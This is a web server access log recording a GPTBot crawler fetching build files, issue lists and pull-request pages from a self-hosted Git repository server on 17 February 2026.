"/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33319] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33316] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33276] [Gzip 10.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:50:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33316] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json?display=source" [Client 74.7.227.38] [Length 33321] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" +[17/Feb/2026:19:50:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 26535] [Gzip 6.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:19:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11608] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:50:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:50:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:50:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14332] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14334] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:50:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:50:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14333] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:19:50:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:19:50:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10171] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:50:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:50:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10176] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&project=-1&state=open&type=all" +[17/Feb/2026:19:50:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11628] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11629] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11626] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:19:50:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html?display=source" [Client 74.7.227.38] [Length 227370] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:19:50:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html?display=rendered" [Client 74.7.227.38] [Length 10978] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" +[17/Feb/2026:19:50:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:19:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10032] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10004] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h?display=source" [Client 74.7.227.38] [Length 16092] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/include/site/python3.12/greenlet/greenlet.h" +[17/Feb/2026:19:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11014] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211065] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211048] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" 